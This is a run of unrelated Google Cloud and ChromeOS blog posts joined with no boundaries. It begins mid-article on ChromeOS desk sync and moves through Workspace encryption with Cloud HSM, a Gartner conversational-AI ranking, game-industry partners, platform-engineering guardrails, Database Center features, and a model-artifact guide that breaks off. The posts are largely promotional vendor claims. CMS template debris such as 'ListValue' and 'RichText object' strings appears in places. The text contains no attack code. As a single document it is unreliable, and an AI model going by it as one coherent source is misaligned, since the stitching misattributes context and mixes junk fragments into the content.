Take a look at Village Hotel Club, who uses desk sync to share devices between hotel employees. At every hotel’s leisure center, two Chromebooks are available to share, which allows employees to take a ChromeOS device with them as they walk prospective members through their facilities, and then complete applications directly from that same device. This means employees can count on a reliable application experience across devices, without any disruptions to their workflows that could potentially impact customer service.
ChromeOS has revolutionized the way we work and revolutionized my role as an IT manager keeping data, people, and devices safe. It has also improved collaboration to the point that I couldn’t imagine how we could work effectively without them.
Dan Morley
Head of IT Infrastructure and Service Delivery, Village Hotels
In healthcare environments, desk sync optimizes essential tasks and enhances data consistency. Healthcare professionals can effortlessly move between patient rooms, nurse stations, or any other departments where devices can’t be moved around, accessing electronic health records, diagnostic tools, and communication platforms. Having access to consistent experiences to work across also helps support data privacy by reducing opportunities for vulnerabilities, human error, and data management issues. Overall, desk sync allows healthcare staff to spend less time worrying about login procedures and system navigation, and more time on direct patient care and critical tasks.
Within manufacturing use cases, desk sync contributes to a more continuous production flow and helps support team hand-offs. Manufacturing line workers and supervisors alike can easily move between workstations, accessing real-time data, quality control applications, and dashboards without significant delays. For shift changes, teams can more easily get up and running with desk sync, reducing disruptions in operations between shifts. Ultimately, reduced time spent on device setup will lead to more efficient time spent on the production floor and better operational efficiency as a result.
Future proof your frontline
ChromeOS desk sync is a powerful tool designed to meet the needs of modern work environments. By making it easier to transition between devices, it greatly reduces downtime and disruptions commonly associated with device switching. Whether in retail environments, hospitality, healthcare, or many other industries, desk sync provides consistency across devices, and empowers employees to focus more on their productivity and delivering exceptional customer experiences. If you’d like to get started with ChromeOS desk sync today, you can view our help center page to begin your configuration.
Interested in learning more about how ChromeOS can support shared device use cases? Visit our website.
Organizations in highly-regulated sectors, such as government, defense, financial services, and healthcare, are required to meet stringent standards to safeguard sensitive data. Client-side encryption (CSE) for Google Workspace is a unique, privacy-preserving offering that keeps customer data confidential and enables the customer to be the sole arbiter of their data, helping them adhere to rigorous compliance regimes.
Google Workspace CSE adds another layer of encryption to your organization’s data — like files, emails, meetings, and events — in addition to the default encryption that Google Workspace provides. CSE can be especially beneficial for organizations that store sensitive and regulated data because it can provide:
Confidentiality for organizations working with sensitive intellectual property, healthcare records, and financial data.
Compliance support for organizations in highly-regulated industries that have ITAR and EAR requirements.
Data sovereignty for organizations that need demonstrative data control using encryption keys that can be held at a defined boundary, such as a specific geographic location or within a nation’s borders.
To help highly-regulated organizations meet their encryption key service obligation, we are now offering Cloud Hardware Security Module (HSM) for Google Workspace (CHGWS,) bringing Google Cloud’s highest levels of compliance classifications to Workspace CSE customers. Cloud HSM is a highly available and scalable, fully managed key management service operated at cloud scale with hardware-backed keys stored in FIPS 140-2 Level 3 compliant HSMs (hardware security modules).
Available today in the U.S., and globally in the coming months, CHGWS offers a convenient, flat pricing model that makes it easy to set up and maintain.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e950b5c3970>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Use Cloud HSM to help meet regulatory obligations
Cloud HSM is engineered to support cloud workloads that are subject to the most stringent security and regulatory mandates, and has undergone comprehensive audits and achieved compliance with regulations and certifications including FedRAMP High, DISA IL5, ITAR, SOC 1/2/3, and PCI DSS.
A cornerstone of Cloud HSM for Google Workspace’s security posture is its reliance on FIPS 140-2 Level 3 validated Marvell LiquidSecurity HSMs. Specifically, the service uses models CNL3560-NFBE-2.0-G and CNL3560-NFBE-3.0-G, running firmware versions 3.4 build 09. This validation level is critical, as it indicates that the cryptographic modules have met the highest standards of security for hardware and software components.
This extensive list of certifications provides strong assurance to customers in highly regulated market segments that their key management and data protection needs are met in accordance with the most demanding regulatory and compliance frameworks.
Our emphasis on comprehensive compliance can help simplify the burdens faced by these organizations, and can allow them to confidently deploy and manage their encryption keys while satisfying their legal and audit requirements.
While security and compliance are paramount, Google Cloud also recognizes the critical importance of high availability and scalability for its customers. CHGWS can help address these needs by offering a highly available and standards-compliant CSE key service that can be deployed rapidly, often in minutes.
Our rapid deployment capability, combined with inherent high availability, can help ensure that critical encryption services are always accessible, minimizing potential disruptions to operations.
How does Cloud HSM for Google Workspace work?
CHGWS can enhance privacy and compliance for Google Workspace CSE. The data is encrypted end-to-end and can only be decrypted by users who have permission to access it.
Encrypting data
Step 1: When a user creates content in Google Workspace, the CSE library generates a data encryption key (DEK) that is sent to the CHGWS service.
Step 2: The CHGWS service verifies the user’s identity using a customer-managed identity provider and Google Cloud IAM.
Step 3: The CHGWS service then encrypts the DEK using a customer-managed encryption key (CMEK) stored in Cloud HSM, and sends the encrypted DEK back. Then the CSE library encrypts the content using the DEK, and the encrypted DEK is stored with the content.
Reading encrypted data
When a user tries to access encrypted content the process unfolds in reverse.
Step 4: First, the CSE library sends the encrypted DEK stored with the content to CHGWS service. CHGWS service verifies the user’s identity using the customer-managed identity provider.
Step 5: CHGWS service uses the CMEK stored in Cloud HSM to decrypt the DEK, and sends it back.
Step 6: The CSE library uses the decrypted DEK to decrypt the content.
All the encrypt and decrypt operations using CMEK are always performed inside the HSM. The CMEK never leaves the HSM protection boundary to ensure that customers maintain full control over their encryption keys and data access.
Generating audit logs using Cloud Logging: As with all Google Cloud services, Cloud HSM service writes audit logs that record administrative activities and accesses in your Google Cloud resources. Audit logs help you answer “who did what, where, and when?” in your Google Cloud resources, with the same level of transparency as in on-premises environments. This is part of our comprehensive Access Transparency offering.
Enabling audit logs can help your security, auditing, and compliance entities monitor Google Cloud data and systems for possible vulnerabilities or external data misuse. You can learn more about KMS Audit Logging here.
We believe this report marks a pivotal moment for enterprise leaders, signaling a market shift where having a strong vision is no longer an abstract concept but the critical indicator of a platform’s ability to move beyond simple cost-saving automation and deliver transformative business value. We believe Google’s position in this report reflects our core thesis: the future of customer engagement is not just conversational, but agentic—proactively solving problems, personalizing experiences, and creating new revenue opportunities.We see our position as a testament to Google’s AI innovation, global presence and customer momentum that is transforming customer service operations across industries, and enabling businesses to deliver exceptional customer experiences across all their engagement touchpoints and channels.
Customer Engagement Suite with Google AI is an end-to-end application that delivers exceptional self-service, agent assistance, and operational insights across customer service and engagement channels. Conversational Agents is the conversational AI platform capability within this suite that enables organizations to create and deploy multimodal, multilingual virtual agents with human-like conversational AI across multiple channels.
Forefront of innovation with Google DeepMind
A winning vision for conversational AI must be grounded in technology that can deliver on its promise. For a decade, enterprises have been promised AI that feels natural and intuitive. At Google we’ve leveraged our extensive experience in search, natural language processing, machine learning, and voice generation to deliver cutting edge conversational capabilities to our customers. This is not the result of a single breakthrough, but the convergence of enterprise-grade innovation in the cloud with cutting-edge innovations fromGoogle DeepMind. We are moving the market past brittle, single-purpose chatbots by embedding multimodal models like Gemini to power our next generation Conversational Agents. This allows businesses to move from merely reacting to customer queries to proactively understanding intent, personalizing interactions with high-fidelity voice, and resolving complex issues in a single, seamless engagement—transforming a support call from a cost center into a brand-building experience.
Building on Google DeepMind’s innovation, we have incorporated the latest Gemini capabilities into Conversational Agents including Gemini Flash, our most efficient model designed for speed and low-cost. Google DeepMind has been pushing the frontiers of audio generation with models that can create high quality, natural speech from a range of inputs, including text, tempo controls and voices. By integrating the latest technology into our speech model and transcription voice capabilities, our Agents provide enhanced emotional understanding with high definition voices for more personalized and natural interactions.
The deployment of these conversational AI innovations extend beyond the Customer Engagement Suite. Purpose-built vertical AI agents including the Food Ordering and Automotive AI Agents leverage these innovations to deliver exceptional conversational experiences for end customers. The industry leading conversational search and multimodal capabilities in Google Agentspace and Vertex AI Search are enabled by Gemini.
Global momentum across conversational use cases
The multilingual and multimodal capabilities of Customer Engagement Suite with Google AI enable an always-on engagement for customers, scaling self-service across geographies and timezones with over 100 available languages and dialects. Global customers delivering real-world impact from our Conversational AI capabilities include:
Best Buy: This retailer generates conversation summaries in real time, allowing live agents to give their full attention to understanding and supporting customers, resulting in an over 60 second reduction in average call time and after-call work. They’ve also improved customer experiences by significantly reducing transfer and repeat call rates.
Definity: Adopting gen AI in its call center operations has already led this leading Canadian P&C insurance company to a 20% improvement in call handle time, a 15% productivity increase, and automated authentication for 75% of customers.
Bouygues Telecom: The virtual sales agents of this French telecom provider have handled over 50,000 conversations since their launch.
Our library of pre-built agents, industry-specific services accelerators, extensive global partner network, and compliance certifications ranging from HIPAA to FedRAMP High enable us to support customers across various industries, including some of the most highly regulated like Financial Services and Government. With built-in feedback mechanisms, data grounded in enterprise truth, and granular controls, we are committed to responsible AI and enterprise-grade security and compliance.
Riding the AI wave through a unified AI stack
AI is raising the bar for how organizations engage with customers, with speed, intelligence and personalized support no longer a ‘nice to have’ when it comes to customer expectations. Gartner predicts that by 2028, 50% of the customer service organizations will have adopted AI agents to improve customer self-service capabilities1.
Our vision is to deliver proactive, personalized customer experiences with AI that knows the user, anticipates their needs, and engages them seamlessly across every touchpoint. With our Next Generation Conversational Agents, we enable highly engaging customer experiences that deliver human-like, natural voices, high degree of comprehension and personalization to help the AI agents adapt during conversations. It simplifies how AI agents are built by providing a new collaborative builder experience that uses AI to create AI agents and access to our continuously expansive integrations across data stores and actions.
Unlike point solutions, Customer Engagement Suite with Google AI is an end-to-end application with Conversational Agents integrating seamlessly alongside the Agent Assist, Conversational Insights and Google Contact Center as a Service (CCaaS) products. Customers can maximize business impact with a full contact center transformation by implementing the complete suite, or they can expedite time to value by integrating the individual Conversational AI products in their existing contact center environment. Underpinned by purpose-built AI stack, our customers benefit from our fully integrated, supercomputing architecture specifically designed for gen AI and other AI workloads.
Next steps
We believe being positioned as a Leader in the Gartner® Magic Quadrant™ for Conversational AI Platforms underscores Google’s proven ability to deliver real business value, and we believe being positioned furthest in vision highlights Google’s AI innovation and potential to transform customer experiences with AI agents and the next generation of Customer Engagement Suite.
To download the full 2025 Gartner Magic Quadrant™ for Conversational AI Platforms report, click here.
1. Gartner, Innovation Insight: Augmenting Conversational AI Platforms With Agentic AI – Uma Challa, June 26, 2025
Gartner, Magic Quadrant for Conversational AI Platforms – Gabriele Rigon, Justin Tung, Bern Elliot, Arup Roy, Adrian Lee, Uma Challa, August 13, 2025
Disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
The games industry is on a powerful ride, surging forward with innovation and a sharp focus on the player experience. For years, the industry’s evolution was defined by familiar IPs getting better graphics and gameplay. At Google Cloud, we believe we’re on the cusp of something far more radical — a shift on the scale of the transition from cartridges to CD-ROMs, or 2D to 3D graphics. This new era is defined by the rise of “living games,” a new form of dynamic, ever-evolving experiences powered by AI that captivate players for years.
With the global market for games surpassing $180 billion in 2024, this fundamental shift in how games are developed, played, and experienced creates an entirely new opportunity for the industry. A big part of what’s driving this shift is the transformative power of cloud computing and AI, and many cutting-edge developers and startups are already taking advantage of these advances.
Cloud platforms are now the core of a $12.9 billion ecosystem within games, with AI adoption emerging as a central growth driver. In fact, Google Cloud’s new survey, conducted by The Harris Poll, reveals just how deeply integrated AI has become: 97% of game developers agree that AI is reshaping the games industry. They already see this evolving technology as fundamentally changing how they create games and what players expect. This new technology is turning the weeks-long live-operations cycle into an instantaneous, AI-driven feedback loop that creates a game world that feels truly alive.
The vision of truly living games is no longer a distant dream; it’s a reality unfolding today. Google Cloud is helping drive this forward through the powerful combination of Google’s deep live service expertise and cutting-edge cloud and generative AI technologies.
It’s this kind of innovation that’s driving new and expanded collaborations with incredible games customers and partners, including Atlas, Embody, Ludeo, Nacon, and Nitrado. These pioneers are pushing the boundaries of what’s possible in games, from creating more immersive player experiences to accelerating game development and scaling their operations.
Atlas: AI for creating vast 3D game worlds
Atlas is an agentic 3D-content creation platform designed for professional game studios, enabling them to generate game-ready assets, environments, tools, and workflows. It focuses on production-scale workflows rather than one-off asset generation, acting as a creative assistant through its multi-agent AI system. Developers can co-create with intelligent AI agents using natural language prompts, ensuring the output is tailored to their specific technical and aesthetic goals. Atlas integrates with industry-standard pipelines like Unreal Engine, Unity, and Houdini, making it ideal for AA+ teams building complex games at scale.
“We believe AI-native games will define the next chapter in interactive entertainment,” said Ben James, chief executive officer, Atlas. “These experiences will be dynamic, personalized, and constantly evolving — and they’ll require a new creative infrastructure. Partnering with Google Cloud gives us the compute foundation and orchestration support to bring that vision to life.”
Atlas is collaborating with Google Cloud to supercharge its multi-agent AI infrastructure and accelerate the development of AI-native games. The platform is built entirely on Google Cloud’s infrastructure and uses our model orchestration tools, including Vertex AI. This provides Atlas with the robust compute foundation and orchestration support necessary to bring its vision to life, enabling a new era of dynamic, evolving interactive entertainment.
“Atlas’s ability to seamlessly integrate with our highly customized workflows has been a game changer,” said Joseph Burnette, technical director of the Innovation Technology Division at SQUARE ENIX. “By deeply understanding the nuances of our pipeline, they’ve become an invaluable partner, enabling us to deliver high-quality, performance-optimized solutions with impressive agility.”
Embody: Personalized spatial audio for unrivaled immersion
Embody is an AI technology company revolutionizing sound for games, music, and XR experiences through its Immerse AI Engine. This engine uses machine learning, 3D neural networks, and computer vision to deliver personalized spatial audio on any headphones. Simply by analyzing a short smartphone video of a player’s head and ears, Embody creates a unique sound profile for a hyper-realistic and deeply immersive experience. AI-native head tracking and adaptive EQ further enhance the audio, ensuring a consistent and top-tier sound experience across all devices.
To power these complex, real-time calculations and scale to millions of gamers, Embody relies on Google Cloud’s infrastructure. Access to massive, cost-effective GPU compute power is crucial for generating personalized audio profiles in seconds and for their continuous innovation in spatial sound. Our collaboration also allows Embody’s R&D team to rapidly prototype new ideas and ensure their technology is economically viable and globally scalable. Embody’s Immerse is already enhancing AAA titles like Call of Duty: Black Ops 6, War Zone, Final Fantasy XIV, Cyberpunk 2077, and The Witcher 3: Wild Hunt — and just announced it’s launching with Sea of Thieves.
“Sound is the emotional core of every game, and we believe it should be personal,” said Kapil Jain, chief executive officer, Embody. “With Google Cloud, we’re scaling our AI-powered sound personalization engine to meet the demand of millions of gamers around the world.”
Ludeo: Redefining game discovery with playable moments
Ludeo is the world’s first playable media platform, enabling users to instantly play game highlight clips. Unlike gameplay content consumed today — which turns the experience of playing games into passive videos — Ludeo works directly with studios and publishers to create “playable moments,” called Ludeos, that users can instantly jump into and experience themselves. They can do so whether they own the game or not, without any downloads or lengthy installs.
These Ludeo moments can be shared with a link anywhere, from social media platforms to messaging apps. Passive viewers become active participants in seconds. This helps game studios attract new players, re-engage existing ones by showcasing new content, and even lets players “try before they buy” in-game items, boosting interest and conversion.
To power this vision, Ludeo will bolster its core infrastructure with Google Cloud, using Google Kubernetes Engine (GKE) and GPUs to create a highly optimized, low-latency infrastructure that’s required for their platform. Ludeo will also aim to build the “playable YouTube,” fundamentally changing how players discover and socially engage with games, from popular AAA titles to AAs and indies.
“Google Cloud’s infrastructure strengthens the capabilities and scale of the Ludeo platform,” said Uri Levanon, vice president of business development and partnerships at Ludeo. “This powerful combination will give players the magic of instantly playing game highlights instead of just watching them, in addition to unlocking new growth opportunities for game studios.”
NACON: Accelerating game production with AI transformation
NACON stands as a prominent AA video games company and a leader in high-end games hardware, known for popular titles like RoboCop: Rogue City, Ravenswatch and Test Drive Unlimited Solar Crown. With 15 game studios under its belt, NACON is making a bold strategic pivot, embedding AI at the core of its operations, from game development to marketing.
NACON’s goal is to increase annual game launches, a move heavily reliant on streamlining processes and boosting creativity with AI. This vision encompasses everything from crafting captivating trailers and in-game cinematics to optimizing game maps for racing titles, all designed to enhance player experience and developer efficiency.
Google Cloud is NACON’s partner in this AI-driven transformation, helping NACON innovate faster and deliver unforgettable games experiences. NACON has selected Google Cloud as its preferred partner for game servers, ensuring scalable and reliable infrastructure for their diverse portfolio. They are also using Google’s Veo 3 model as a complementary tool to help produce cinematic trailers and Google’s Gemini model to support localization efforts, enabling NACON to reach new global markets more efficiently. Additionally, NACON will use Looker for deep insights into in-game analytics and player behavior, and Google Threat Intelligence to help their ability to proactively secure their operations against industry threats.
“Partnering with Google Cloud marks a pivotal moment in NACON’s journey to transform game development with AI at its core,” said Alain FALC, president and chief executive officer, NACON. “Google Cloud’s cutting-edge tools empower our teams to innovate faster, streamline production, and deliver richer, more immersive experiences to gamers worldwide.”
Nitrado: Hybrid cloud scaling for flawless multiplayer gaming
Nitrado, a global leader in game server hosting, is making multiplayer game creation even easier for studios with a new capability for their orchestration solution, GameFabric. This platform acts as a unified orchestration layer, allowing game developers to seamlessly combine Nitrado’s high-performance bare metal infrastructure with the elasticity of the cloud, all managed through GameFabric.
This means studios can automatically use Google Cloud to support traffic spikes, like during a big game launch or a busy weekend. Furthermore, studios can bring games closer to their players by instantly deploying servers in new regions, using Google’s planet-scale network to ensure low-latency performance for a global audience. GameFabric can scale up or down automatically, allowing developers to focus on the player experience, not the infrastructure, and studios to keep their games running smoothly and cost-efficiently, no matter how many players jump online or where they are.
With Google Cloud as GameFabric’s preferred cloud provider, studios benefit from Google Cloud’s low-latency global network for a flawless player experience and elastic infrastructure for unlimited scalability. This partnership is built on operational tools like GKE and Agones, which are trusted for managing game servers efficiently and reliably. Plus, Google Cloud’s built-in security and reliability protect game and player data around the clock.
“GameFabric brings together bare metal and cloud in a unified orchestration layer, so studios can scale up, stay fast, and keep costs predictable,” said Raphael Stange, chief executive officer, Nitrado. “This partnership strengthens the hybrid model we’ve built to serve multiplayer studio needs.”
Bring your living games to life
The future of living games isn’t just a concept — it’s being built right now, powered by the dynamic combination of cloud and AI. We’re committed to being the foundational partner for game developers and studios of all sizes, offering the scalable infrastructure, powerful AI tools, and deep expertise needed to bring truly dynamic, immersive, and successful games to players worldwide. We’re excited to see what new experiences emerge as our customers and partners continue to push the boundaries of creativity and technology.
The promise of platform engineering is to accelerate software delivery by empowering developers with self-service capabilities. However, this must be balanced with security, compliance, and operational stability, and for this, you need robust controls. But all too frequently, people talk about “guardrails” — a term whose meaning is often ambiguous, leading to confusion, or worse, disdain. A platform with too many guardrails can feel like a maze of restrictions, turning off the very developers it is trying to recruit.
In order to build a governance framework that enables both fast and safe software delivery, we need to move beyond generic guardrails. In this article, we introduce a practical taxonomy of four distinct platform engineering concepts: golden paths to steer developers; guardrails that act as emergency stops; safety nets, which help ensure recovery from failure; and lastly, manual checkpoints and reviews, whichintroduce human judgment, oversight, and intervention into the application lifecycle. Once you understand the distinctions between these concepts, you’ll be better equipped to select the right tools and strategies for safely advancing your application through its lifecycle.
A modern taxonomy for platform controls
1.Golden paths: Well-paved roads that guide you
The best platforms don’t block developers; they steer them. A golden path (sometimes referred to as a paved road) is a proactive, guiding track that makes the right choice the easy choice. The goal is to accelerate development by providing pre-configured, secure, and efficient patterns that developers want to use. Golden paths aren’t about preventing bad behavior with a wall, but about encouraging good behavior via a well-paved, high-speed lane. Examples include pre-approved Terraform modules that build secure infrastructure by default, standardized CI/CD pipeline templates, or internal developer portals that offer curated, one-click services.
Here are some tools you can use when creating golden paths for developers.
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ed79d12a2b0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
2. Guardrails: The crash barriers
In platform engineering, guardrails are the hard, non-negotiable backstops designed to protect the fundamental integrity of a platform — its security, compliance, and operational stability. While low-friction golden paths guide a developer’s journey, guardrails act as the high-friction, non-negotiable last line of defense.
A guardrail is not a guide rail; its purpose is to prevent a catastrophic event, not to direct the workflow. It functions like an emergency brake, not a steering wheel. Think of it as a crash barrier like in the picture that prevents a catastrophic accident — developers should rarely encounter a guardrail, and when they do, only when a significant deviation from safe practice has occurred. A guardrail doesn’t consider a developer’s immediate goal or speed; it only cares about preventing an action that could compromise the entire system.
Prime examples of guardrails on Google Cloud include an Organization Policy that unconditionally blocks the creation of public storage buckets, or a Binary Authorization policy that rejects any container deployment whose image isn’t cryptographically signed by a trusted source.
The following tools act as guardrails to block potentially catastrophic events.
Organization Policies: Functions as the primary service for setting non-negotiable constraints e.g., blocking public IPs, restricting resource locations, so the constraint itself is the guardrail. Organization policies establish the guardrails, and Google Services provide the means to work effectively within those guardrails.
Binary Authorization: Acts as a strict, non-negotiable gatekeeper, blocking unapproved container deployments in Google Kubernetes Engine (GKE) and Cloud Run.
VPC Service Controls: Creates an impassable network perimeter to prevent data exfiltration.
IAM Conditions andRoles: Enforces strict, context-aware access controls at runtime.
Gatekeeper: Enforces non-negotiable security profiles on pods at creation time in GKE.
Container sandboxing withgVisor: Provides hard isolation between a container and the host kernel, preventing container escapes.
Vertex AI safety filters: Unconditionally blocks the generation of harmful content from AI models.
Google Cloud Firewall: A globally distributed, stateful service that allows you to enforce granular, layer 4 traffic-filtering policies for your Virtual Private Cloud (VPC) networks.
Google Cloud Armor(WAF & DDoS Mitigation): Acts as a hard shield, blocking malicious web traffic and DDoS attacks before they reach the application.
Shielded GKE Nodes /Shielded VMs: Enforces secure boot and integrity checks, preventing the node from starting if its boot sequence is compromised.
Artifact Registry(when used to block vulnerable dependencies): Can be configured to block builds if dependencies with critical vulnerabilities are found.
3. Safety nets: Detection and response airbags
Finally, because failures and threats are inevitable, we need safety nets. A safety net is a reactive control that activates after an error or failure has already occurred. Its purpose is not to prevent the initial event, but to detect the problem, mitigate its impact, and facilitate a swift recovery. Continuing with the car analogy, if a golden path is the well-marked road and a guardrail is the concrete barrier, the safety net is the airbag and seatbelt — it doesn’t prevent the crash, but it dramatically reduces the harm. This category includes monitoring systems that alert on failures, automated rollback mechanisms, backup and restore procedures, and security systems that detect intrusions. The focus is on resilience and damage limitation.
These tools are used to detect and mitigate failures or threats after they have occurred.
Cloud Monitoring: Detects performance degradation, failures, and anomalies and sends alerts.
Cloud Logging: Provides the raw data to detect and investigate incidents after they happen.
Security Command Center (SCC): Acts as the central hub for detecting and viewing existing misconfigurations, vulnerabilities, and threats across Google Cloud.
Firebase Test Lab: Detects issues in mobile applications by running tests on real and virtual devices.
Understanding the unique purpose of these three automated control mechanisms — golden paths (steering), guardrails (prevention), and safety nets (reacts or detects post event) — clarifies the intent behind every tool we implement and empowers us to build a platform that is both fast and safe.
Beyond automated controls: Manual checkpoints and reviews
Everything that we’ve discussed thus far — golden paths, guardrails, and safety nets — almost always refers to automated controls, which are a type of control point programmatically integrated into the platform’s workflow, providing speed, consistency, and efficiency. However, other control points inherently require human judgment, oversight, and intervention — think budget approval, architecture reviews, or security post–mortems. As such, manual processes are still a crucial component of a comprehensive governance framework, allowing people to judge complex scenarios. Manual checkpoints and reviews help provide accountability, holistic risk assessments, and audit trails in ways that automated systems alone cannot guarantee (albeit frequently generating a high amount of friction).
Here are some examples of scenarios where you may want to implement manual checkpoints and reviews:
FinOps cost visibility and allocation: Using tools to track cloud spending and allocate costs to specific teams or projects. Here, the Google Cloud FinOps Hub can serve as a centralized dashboard.
FinOps budgeting and forecasting: Setting budgets and forecasting future cloud costs to prevent overspending.
FinOps cost optimization: Implementing strategies to reduce cloud costs, such as rightsizing resources, using reserved instances, and automating a “lights on/lights off” approach to your cloud infrastructure.
Architectural reviews: Formal sessions where architects and senior engineers review proposed system designs. To provide a structured approach, these reviews are often guided by the Google Cloud Well-Architected Framework, where reviewers assess the design against its core pillars: security, reliability, cost optimization, performance, and operational excellence. This involves validating specific aspects, such as the design of air-gapped environments, ensuring reliability requirements are met, and confirming cost-effectiveness. These sessions provide a critical check for complex system interactions that automated tools might miss.
Code reviews (manual): While automated tools catch many issues, it’s critical for a real person to review code changes. Reviewers can identify subtle logic errors, potential race conditions, adherence to non-automatable coding standards or architectural patterns, and opportunities for knowledge sharing and mentoring.
Security assessments: Activities like manual penetration testing, targeted vulnerability assessments, and threat modeling performed by specialized security teams or third-party experts. These assessments simulate real-world attacks and probe for weaknesses that automated scanners might overlook, providing deep insights into the platform’s security posture.
Change management: Formal processes for reviewing, approving, and scheduling significant changes to production environments, often involving a Change Advisory Board (CAB). The process includes assessing the potential risk and impact of changes, ensuring rollback plans are in place, and coordinating deployments. Backlog review and prioritization also fall into this category, as they involve human judgment on strategic direction.
Compliance audits: Verifying adherence to regulatory requirements (like PCI-DSS or HIPAA), which often involves manual inspection of configurations, processes, and collected evidence by internal or external auditors. Even if data gathering is automated via tools like Security Command Center, interpretation and sign-off typically require human auditors.
License management: Ensuring compliance with third-party software licenses, which can involve manual tracking, inventory management, and validation processes (although tools can assist).
The challenge lies in balancing these manual processes with the need for agility. Overly burdensome manual gates can become significant bottlenecks, slowing down delivery pipelines. Platform teams should continuously evaluate manual processes, seeking opportunities for streamlining or partial automation, all while ensuring they still provide their intended value in risk mitigation and governance.
From theory to practice
Ultimately, platform engineering is about balancing developer velocity with robust governance. A successful strategy on Google Cloud depends not on a single type of control, but on a thoughtful blend of different mechanisms. By implementing low-friction golden paths to steer developers, hard-stop guardrails to prevent disaster, and resilient safety nets for swift recovery, we create a layered and effective platform-control framework. By thoughtfully combining these automated and manual controls on Google Cloud, we can build a platform that truly empowers developers without sacrificing security or stability.
In the meantime, consider these strategies for adding extra layers of control to your platform — without placing an undue burden on developers.
Adopt the new vocabulary: Before using the term “guardrail”, stop and consider if you’re using it as a catch-all term, or if you need to start using the more precise taxonomy of golden paths, guardrails, safety nets, or manual checkpoints correctly.
Audit your existing controls: Use this new framework as a lens to evaluate your current platform.
Build with intent: Consciously decide which type of control is most appropriate for each situation.
Balance and optimize: Continuously evaluate the balance between automated controls and manual checkpoints. Strive to build a platform that empowers developers through the software lifecycle with self-service and speed, rather than putting up yet another wall.
Database Center is an AI-powered unified fleet management solution that can help you identify and address security risks, performance bottlenecks, and reliability issues for Google Cloud databases including Cloud SQL, AlloyDB, Spanner, Bigtable, Memorystore, and Firestore. Today, we are excited to announce that Database Center can now monitor your self-managed MySQL, PostgreSQL, and SQL Server databases on Google Compute Engine. In addition, we’re also unveiling several new usability enhancements. Let’s dive in!
Expanded coverage: Support for self-managed databases
Many customers run their PostgreSQL, MySQL and SQL server databases on Compute Engine VMs, and have asked for support for monitoring them. Database Center’s monitoring capabilities now extend to these self-managed databases, giving you a holistic view of your entire database estate, both managed and self-managed, from a single, unified interface. Database Center can now also proactively detect and help troubleshoot common security vulnerabilities in databases hosted on Compute Engine VMs, including:
Outdated minor versions: Automatically identify databases running on older minor versions, which may lack the latest security patches.
Auditing not enabled: Flag databases where auditing is not enabled, a critical component for security and compliance.
Broad IP access range: Detect overly permissive IP access ranges, a common security risk that can expose your databases to unauthorized access.
No root password: Identify databases without a root password, a significant security risk.
Allows unencrypted direct connections: Highlight databases that permit unencrypted direct connections.
By bringing your self-managed databases on Compute Engine into the fold, Database Center helps you monitor security and drive operational rigor across your entire database fleet, improving your security posture and simplifying compliance.
This capability is currently in preview and you can sign-up for early access. To enable monitoring of self-managed databases, a lightweight VM agent must be installed. Please see the Database center documentation or the console for more details.
Alerting for new resources and issues for all the databases
To help you stay ahead of potential issues, Database Center now lets you create custom alerts for:
New database resources: Get notified whenever a new database (specific product/version/region) is provisioned in your project, helping to ensure that you have full visibility and control over your database landscape.
New signals: Receive alerts (email, slack/Google chat messages. etc.) for any new issue types detected by Database Center, enabling you to take immediate action and mitigate risks before they impact your applications.
These new alerting capabilities provide you with the proactive monitoring you need to maintain a highly performant, reliable, secure, and compliant database environment.
Simplify fleet monitoring at scale using folder-level chat
Database Center’s Gemini-powered natural language capabilities are now available at the folder level. This means you can now have contextual conversations about your databases within a specific folder, making it easier to manage and troubleshoot databases, especially in large and complex organizational environments.
Historical fleet comparison of up to 30 days
We’ve significantly enhanced Database Center’s historical comparison feature to aid in capacity planning and the analysis of database fleet health. We previously offered a seven-day historical comparison for database inventory and issues; now you have the option of 1 day, 7 days and 30 days historical comparison.
With the user-friendly time range picker, you can get a detailed comparison of:
New database inventory: See exactly which databases have been added to your fleet since the selected date.
New issues detected: Identify new security and operational issues that have emerged over the chosen time period.
This expanded historical view provides you with valuable insights into the evolution of your database fleet, enabling you to track trends, identify patterns, and make more informed decisions.
Get started today
These new features are designed to provide you with a more comprehensive, intelligent, and proactive database management experience. We’re confident that they will make it easier to manage your database fleet, help reduce your security risks, and improve the overall performance and availability of your applications. Please note that Database Center is available to use at no additional cost for Google Cloud customers.
To get started with these new features, please refer to Database Center documentation:
Managing large model artifacts is a common bottleneck in MLOps. Baking models into container images leads to slow, monolithic deployments, and downloading them at startup introduces significant delays. This guide explores a better way: decoupling your models from your code by hosting them in Cloud Storage and accessing them efficiently from GKE and Cloud Run. We’ll compare various loading strategies, from traditional methods to the high-performance Cloud Storage FUSE CSI driver, to help you build a more agile and scalable ML serving platform.
Optimizing the artifact
To optimize the artifact, we recommend that you centralize in Cloud Storage, and then use quantization and cache warming.
Centralizing in Cloud Storage
The most important step toward a scalable ML serving architecture is to treat the model artifact as a first-class citizen, with its own lifecycle, independent of the application code. The best way to do this is to use Cloud Storage as the central, versioned, and secure source of truth for all model assets, such as .safetensors, .gguf, .pkl, or .joblib files.
This architectural pattern does more than just provide a convenient place to store files. It establishes a unified model plane that is logically separate from the compute plane where inference occurs. The model plane is hosted on Cloud Storage, and it handles the governance of the ML asset: its versioning, storage durability, and access control.
